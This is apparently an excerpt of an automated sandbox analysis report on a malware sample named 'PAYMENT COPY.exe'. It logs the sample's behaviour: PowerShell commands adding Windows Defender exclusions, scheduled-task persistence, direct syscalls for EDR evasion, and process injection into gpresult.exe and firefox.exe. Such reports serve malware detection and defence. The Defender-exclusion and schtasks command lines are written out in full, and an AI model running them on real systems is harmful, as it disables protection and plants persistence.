Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov ecx, dword ptr fs:[00000030h]	9_2_014E2835
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]	9_2_014E2835
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]	9_2_014E2835
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA830 mov eax, dword ptr fs:[00000030h]	9_2_014FA830
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE8C0 mov eax, dword ptr fs:[00000030h]	9_2_014EE8C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015908C0 mov eax, dword ptr fs:[00000030h]	9_2_015908C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC8F9 mov eax, dword ptr fs:[00000030h]	9_2_014FC8F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC8F9 mov eax, dword ptr fs:[00000030h]	9_2_014FC8F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158A8E4 mov eax, dword ptr fs:[00000030h]	9_2_0158A8E4
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154C89D mov eax, dword ptr fs:[00000030h]	9_2_0154C89D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0887 mov eax, dword ptr fs:[00000030h]	9_2_014C0887
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156EB50 mov eax, dword ptr fs:[00000030h]	9_2_0156EB50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01592B57 mov eax, dword ptr fs:[00000030h]	9_2_01592B57
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01592B57 mov eax, dword ptr fs:[00000030h]	9_2_01592B57
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01592B57 mov eax, dword ptr fs:[00000030h]	9_2_01592B57
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01592B57 mov eax, dword ptr fs:[00000030h]	9_2_01592B57
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01568B42 mov eax, dword ptr fs:[00000030h]	9_2_01568B42
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556B40 mov eax, dword ptr fs:[00000030h]	9_2_01556B40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556B40 mov eax, dword ptr fs:[00000030h]	9_2_01556B40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158AB40 mov eax, dword ptr fs:[00000030h]	9_2_0158AB40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8B50 mov eax, dword ptr fs:[00000030h]	9_2_014B8B50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574B4B mov eax, dword ptr fs:[00000030h]	9_2_01574B4B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574B4B mov eax, dword ptr fs:[00000030h]	9_2_01574B4B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BCB7E mov eax, dword ptr fs:[00000030h]	9_2_014BCB7E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153EB1D mov eax, dword ptr fs:[00000030h]	9_2_0153EB1D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594B00 mov eax, dword ptr fs:[00000030h]	9_2_01594B00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EEB20 mov eax, dword ptr fs:[00000030h]	9_2_014EEB20
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EEB20 mov eax, dword ptr fs:[00000030h]	9_2_014EEB20
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01588B28 mov eax, dword ptr fs:[00000030h]	9_2_01588B28
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01588B28 mov eax, dword ptr fs:[00000030h]	9_2_01588B28
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]	9_2_014C0BCD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]	9_2_014C0BCD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0BCD mov eax, dword ptr fs:[00000030h]	9_2_014C0BCD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]	9_2_014E0BCB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]	9_2_014E0BCB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E0BCB mov eax, dword ptr fs:[00000030h]	9_2_014E0BCB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156EBD0 mov eax, dword ptr fs:[00000030h]	9_2_0156EBD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154CBF0 mov eax, dword ptr fs:[00000030h]	9_2_0154CBF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EEBFC mov eax, dword ptr fs:[00000030h]	9_2_014EEBFC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]	9_2_014C8BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]	9_2_014C8BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8BF0 mov eax, dword ptr fs:[00000030h]	9_2_014C8BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574BB0 mov eax, dword ptr fs:[00000030h]	9_2_01574BB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574BB0 mov eax, dword ptr fs:[00000030h]	9_2_01574BB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0BBE mov eax, dword ptr fs:[00000030h]	9_2_014D0BBE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0BBE mov eax, dword ptr fs:[00000030h]	9_2_014D0BBE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0A5B mov eax, dword ptr fs:[00000030h]	9_2_014D0A5B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0A5B mov eax, dword ptr fs:[00000030h]	9_2_014D0A5B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6A50 mov eax, dword ptr fs:[00000030h]	9_2_014C6A50
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]	9_2_014FCA6F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]	9_2_014FCA6F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FCA6F mov eax, dword ptr fs:[00000030h]	9_2_014FCA6F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153CA72 mov eax, dword ptr fs:[00000030h]	9_2_0153CA72
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153CA72 mov eax, dword ptr fs:[00000030h]	9_2_0153CA72
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156EA60 mov eax, dword ptr fs:[00000030h]	9_2_0156EA60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154CA11 mov eax, dword ptr fs:[00000030h]	9_2_0154CA11
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EEA2E mov eax, dword ptr fs:[00000030h]	9_2_014EEA2E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FCA24 mov eax, dword ptr fs:[00000030h]	9_2_014FCA24
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FCA38 mov eax, dword ptr fs:[00000030h]	9_2_014FCA38
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E4A35 mov eax, dword ptr fs:[00000030h]	9_2_014E4A35
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E4A35 mov eax, dword ptr fs:[00000030h]	9_2_014E4A35
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0AD0 mov eax, dword ptr fs:[00000030h]	9_2_014C0AD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]	9_2_01516ACC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]	9_2_01516ACC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01516ACC mov eax, dword ptr fs:[00000030h]	9_2_01516ACC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F4AD0 mov eax, dword ptr fs:[00000030h]	9_2_014F4AD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F4AD0 mov eax, dword ptr fs:[00000030h]	9_2_014F4AD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FAAEE mov eax, dword ptr fs:[00000030h]	9_2_014FAAEE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FAAEE mov eax, dword ptr fs:[00000030h]	9_2_014FAAEE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]	9_2_014CEA80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]	9_2_014CEA80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CEA80 mov eax, dword ptr fs:[00000030h]	9_2_014CEA80

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryInformationProcess: Direct from: 0x77392C26
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtResumeThread: Direct from: 0x77392FBC	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtWriteVirtualMemory: Direct from: 0x7739490C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateUserProcess: Direct from: 0x7739371C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77392BFC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQuerySystemInformation: Direct from: 0x77392DFC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtReadFile: Direct from: 0x77392ADC	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtTerminateThread: Direct from: 0x77387B2E	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtDelayExecution: Direct from: 0x77392DDC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtWriteVirtualMemory: Direct from: 0x77392E3C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateMutant: Direct from: 0x773935CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtResumeThread: Direct from: 0x773936AC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtMapViewOfSection: Direct from: 0x77392D1C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenKeyEx: Direct from: 0x77392B9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationProcess: Direct from: 0x77392C5C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtProtectVirtualMemory: Direct from: 0x77392F9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtNotifyChangeKey: Direct from: 0x77393C2C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryInformationToken: Direct from: 0x77392CAC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateFile: Direct from: 0x77392FEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenFile: Direct from: 0x77392DCC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtTerminateThread: Direct from: 0x77392FCC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtDeviceIoControlFile: Direct from: 0x77392AEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77392BEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQuerySystemInformation: Direct from: 0x773948CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryVolumeInformationFile: Direct from: 0x77392F2C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x773948EC	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenSection: Direct from: 0x77392E0C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77393C9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationThread: Direct from: 0x773863F9
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtClose: Direct from: 0x77392B6C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationThread: Direct from: 0x77392B4C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtReadVirtualMemory: Direct from: 0x77392E8C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateKey: Direct from: 0x77392C6C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryAttributesFile: Direct from: 0x77392E6C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory written: C:\Users\user\Desktop\PAYMENT COPY.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory written: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: NULL target: C:\Windows\SysWOW64\gpresult.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: NULL target: C:\Windows\SysWOW64\gpresult.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\gpresult.exe

Thread register set: target process: 5928

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\gpresult.exe

Thread APC queued: target process: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp525.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bQrgcvrrXfGN" /XML "C:\Users\user\AppData\Local\Temp\tmp1D60.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Process created: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe "C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Process created: C:\Windows\SysWOW64\gpresult.exe "C:\Windows\SysWOW64\gpresult.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
